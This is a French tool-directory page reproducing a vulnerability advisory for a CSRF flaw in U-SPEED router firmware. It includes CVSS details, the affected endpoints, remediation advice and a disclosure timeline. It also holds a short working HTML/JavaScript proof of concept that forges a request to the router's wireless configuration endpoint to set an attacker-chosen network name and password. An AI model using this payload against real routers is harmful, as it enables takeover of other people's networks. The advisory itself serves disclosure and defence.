Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-36960 — Preuve de concept d'exploitation pour CVE-2026-36960, une vulnérabilité CSRF dans le firmware du routeur U-SPEED permettant des modifications de configuration non autorisées via des requêtes forgées. | Kitploit
Outils/GitHubGitHub/kirubel-cve/cve-2026-36960
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubkirubel-cve/cve-2026-36960

CVE-2026-36960

Preuve de concept d'exploitation pour CVE-2026-36960, une vulnérabilité CSRF dans le firmware du routeur U-SPEED permettant des modifications de configuration non autorisées via des requêtes forgées.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-36960 : Cross-Site Request Forgery (CSRF) dans l'interface d'administration Web

ID CVE : CVE-2026-36960 Date : 2026-04-29 Découvreur : Kirubel Solomne Fournisseur : U-SPEED Produit : Routeur U-SPEED Version du firmware : V1.0.0 CWE : CWE-352 - Cross-Site Request Forgery (CSRF)


Description

Le firmware V1.0.0 du routeur U-SPEED ne met pas en œuvre de mécanismes de protection CSRF tels que des jetons anti-CSRF ou une validation stricte des en-têtes Origin/Referer pour les points de terminaison d'API administratifs. Un attaquant peut créer une page Web malveillante qui envoie des requêtes HTTP falsifiées vers les points de terminaison de configuration. Si un administrateur authentifié visite la page Web malveillante, le routeur traite la requête comme une action administrative légitime.


Score CVSS

Score CVSS v3.1 : 8,8 (Élevé) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

MétriqueValeur
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisAucun
Interaction utilisateurRequise
Impact sur la confidentialitéÉlevé
Impact sur l'intégritéÉlevé
Impact sur la disponibilitéÉlevé

Points de terminaison concernés

Point de terminaisonFonction
/api/setWlanConfiguration du réseau sans fil
/api/telnetConfiguration du service Telnet
Autres points de terminaison de configurationDiverses fonctions administratives

Preuve de concept

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Comportement attendu : La requête doit être rejetée en raison de l'absence de jeton CSRF. Comportement réel : Le routeur accepte et traite la requête falsifiée.


Impact

  • Modification non autorisée de la configuration du routeur
  • Prise de contrôle du réseau WiFi
  • Manipulation du service Telnet
  • Déni de service pour les utilisateurs légitimes

Remédiation

  • Mettre en œuvre des jetons anti-CSRF sur tous les points de terminaison modifiant l'état
  • Appliquer une validation stricte des en-têtes Origin et Referer
  • Utiliser l'attribut de cookie SameSite=Strict

Chronologie de divulgation

DateÉvénement
2026-04-29Vulnérabilité découverte
2026-04-29Signalée à MITRE
2026-04-29CVE-2026-36960 attribuée
2026-04-29Divulgation publique

Références

  • MITRE CVE-2026-36960
  • CWE-352
  • Site Web du fournisseur
Télécharger l’outil